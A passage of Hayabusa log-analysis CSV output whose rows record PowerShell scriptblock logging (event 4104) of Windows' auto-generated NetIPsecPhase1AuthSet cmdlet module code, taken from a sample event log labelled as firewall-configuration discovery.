'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmd",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase1AuthSet { 